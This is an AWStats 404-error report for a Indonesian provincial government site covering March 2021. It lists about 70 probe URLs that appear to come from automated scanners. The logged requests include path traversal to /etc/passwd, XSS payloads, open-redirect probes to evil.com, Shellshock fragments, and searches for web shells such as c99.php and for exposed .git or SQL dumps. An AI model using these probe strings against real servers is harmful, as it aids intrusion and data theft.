<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta name="generator" content="AWStats 7.6 (build 20161204) from config file awstats.sikd.jabarprov.go.id.conf (http://www.awstats.org)">
<meta name="robots" content="noindex,nofollow">
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta http-equiv="description" content="Awstats - Advanced Web Statistics for sikd.jabarprov.go.id (2021-03) - errors404">
<title>Statistics for sikd.jabarprov.go.id (2021-03) - errors404</title>
<style type="text/css">
body { font: 11px verdana, arial, helvetica, sans-serif; background-color: #FFFFFF; margin-top: 0; margin-bottom: 0; }
.aws_bodyl  { }
.aws_border { border-collapse: collapse; background-color: #CCCCDD; padding: 1px 1px 1px 1px; margin-top: 0px; margin-bottom: 0px; }
.aws_title  { font: 13px verdana, arial, helvetica, sans-serif; font-weight: bold; background-color: #CCCCDD; text-align: center; margin-top: 0; margin-bottom: 0; padding: 1px 1px 1px 1px; color: #000000; }
.aws_blank  { font: 13px verdana, arial, helvetica, sans-serif; background-color: #FFFFFF; text-align: center; margin-bottom: 0; padding: 1px 1px 1px 1px; }
.aws_data {
	background-color: #FFFFFF;
	border-top-width: 1px;   
	border-left-width: 0px;  
	border-right-width: 0px; 
	border-bottom-width: 0px;
}
.aws_formfield { font: 13px verdana, arial, helvetica; }
.aws_button {
	font-family: arial,verdana,helvetica, sans-serif;
	font-size: 12px;
	border: 1px solid #ccd7e0;
	background-image : url(/awstats-icon/other/button.gif);
}
th		{ border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; padding: 1px 2px 1px 1px; font: 11px verdana, arial, helvetica, sans-serif; text-align:center; color: #000000; }
th.aws	{ border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; padding: 1px 2px 1px 1px; font-size: 13px; font-weight: bold; }
td		{ border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; font: 11px verdana, arial, helvetica, sans-serif; text-align:center; color: #000000; }
td.aws	{ border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; font: 11px verdana, arial, helvetica, sans-serif; text-align:left; color: #000000; padding: 0px;}
td.awsm	{ border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; font: 11px verdana, arial, helvetica, sans-serif; text-align:left; color: #000000; padding: 0px; }
b { font-weight: bold; }
a { font: 11px verdana, arial, helvetica, sans-serif; }
a:link    { color: #0011BB; text-decoration: none; }
a:visited { color: #0011BB; text-decoration: none; }
a:hover   { color: #605040; text-decoration: underline; }
.currentday { font-weight: bold; }
</style>
</head>

<body style="margin-top: 0px">
<a name="top"></a>



<a name="menu">&nbsp;</a>
<form name="FormDateFilter" action="/cgi-bin/awstats.pl?config=sikd.jabarprov.go.id&amp;staticlinks&amp;output=errors404" style="padding: 0px 0px 20px 0px; margin-top: 0">
<table class="aws_border" border="0" cellpadding="2" cellspacing="0" width="100%">
<tr><td>
<table class="aws_data sortable" border="0" cellpadding="1" cellspacing="0" width="100%">
<tr><td class="aws" valign="middle"><b>Statistics for:</b>&nbsp;</td><td class="aws" valign="middle"><span style="font-size: 14px;">sikd.jabarprov.go.id</span></td><td align="right" rowspan="3"><a href="http://www.awstats.org" target="awstatshome"><img src="/awstats-icon/other/awstats_logo6.png" border="0" alt='Awstats Web Site' title='Awstats Web Site' /></a></td></tr>
<tr valign="middle"><td class="aws" valign="middle" width="150"><b>Last Update:</b>&nbsp;</td><td class="aws" valign="middle"><span style="font-size: 12px;">01 Apr 2021 - 07:02</span></td></tr>
<tr><td class="aws" valign="middle"><b>Reported period:</b></td><td class="aws" valign="middle"><span style="font-size: 14px;">Month Mar 2021</span></td></tr>
</table>
</td></tr></table>
</form><br />

<table>
<tr><td class="aws"><a href="javascript:parent.window.close();">Close window</a></td></tr>
</table>

<a name="errors404">&nbsp;</a><br />
<table class="aws_border sortable" border="0" cellpadding="2" cellspacing="0" width="100%">
<tr><td class="aws_title" width="70%">Required but not found URLs (HTTP code 404) </td><td class="aws_blank">&nbsp;</td></tr>
<tr><td colspan="2">
<table class="aws_data" border="1" cellpadding="2" cellspacing="0" width="100%">
<tr bgcolor="#ECECEC"><th>URL (70)</th><th bgcolor="#66DDEE">Error&nbsp;Hits</th><th bgcolor="#4477DD" width="80">Referrers</th></tr>
<tr><td class="aws">/cgi-bin/config.exp</td><td>3</td><td class="aws">-</td></tr>
<tr><td class="aws">//evil.com/%2F..</td><td>3</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/status</td><td>3</td><td class="aws">-</td></tr>
<tr><td class="aws">/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E</td><td>3</td><td class="aws">-</td></tr>
<tr><td class="aws">///evil.com/%2F..</td><td>3</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/test/test.cgi</td><td>2</td><td class="aws">-</td></tr>
<tr><td class="aws">///example.com/%2F..</td><td>2</td><td class="aws">-</td></tr>
<tr><td class="aws">//example.com/%2F..</td><td>2</td><td class="aws">-</td></tr>
<tr><td class="aws">////example.com/%2f%2e%2e</td><td>2</td><td class="aws">-</td></tr>
<tr><td class="aws">/images../.git/config</td><td>2</td><td class="aws">-</td></tr>
<tr><td class="aws">/%5cexample.com/%2f%2e%2e</td><td>2</td><td class="aws">-</td></tr>
<tr><td class="aws">/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd</td><td>2</td><td class="aws">-</td></tr>
<tr><td class="aws">/%00/example.com/</td><td>2</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/kerbynet</td><td>2</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/imagemap.exe</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/images/json</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/test.cgi</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/welcome</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/index.php-bak</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/stats</td><td>1</td><td class="aws">()%20{%20ignored</td></tr>
<tr><td class="aws">/index.php.bak</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/php.ini</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/images/Sym.php</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/status/status.cgi</td><td>1</td><td class="aws">()%20{%20ignored</td></tr>
<tr><td class="aws">/cgi-bin/jarrewrite.sh</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/awstats/</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">////https://sikd.jabarprov.go.idexample.com/%2f%2e%2e</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/assets/file:%2f%2f/etc/passwd</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">////http://sikd.jabarprov.go.idexample.com/%2f%2e%2e</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/index.php5</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/images_upload.php</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/logi.php</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/logoff.cgi</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/phpmyadmin/scripts/setup.php</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/mainfunction.cgi</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/index.html</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/index.php4</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/login</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/htmlscript</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/images_upload.sql</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/images01</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/images_upload.json</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/images_admin</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/htimage.exe</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/index.php~</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/images_upload.txt</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/images_upload.asp</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/multimon.cgi</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/apcupsd/multimon.cgi</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/test</td><td>1</td><td class="aws">()%20{%20ignored</td></tr>
<tr><td class="aws">/index.php3</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/images/c99.php</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/images/README</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/%5chttp://sikd.jabarprov.go.idexample.com/%2f%2e%2e</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/execute_cmd.cgi</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/images_upload.aspx</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/unauth/php/change_password.php/%22%3E%3Csvg%2F%3Dalert(1)%3E</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/images_upload.db</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/images_upload.conf</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/%5chttps://sikd.jabarprov.go.idexample.com/%2f%2e%2e</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/.well-known/acme-challenge/dtfy</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/cgi-bin/a1stats/a1disp.cgi</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/images</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/uploads/dump.sql</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/php/change_password.php/%22%3E%3Csvg%2F%3Dalert(1)%3E</td><td>1</td><td class="aws">-</td></tr>
<tr><td class="aws">/images_upload/</td><td>1</td><td class="aws">-</td></tr>
</table></td></tr></table><br />

<br /><br />
<span dir="ltr" style="font: 11px verdana, arial, helvetica; color: #000000;"><b>Advanced Web Statistics 7.6 (build 20161204)</b> - <a href="http://www.awstats.org" target="awstatshome">Created by awstats (plugins: hashfiles)</a></span><br />

<br />
</body>
</html>
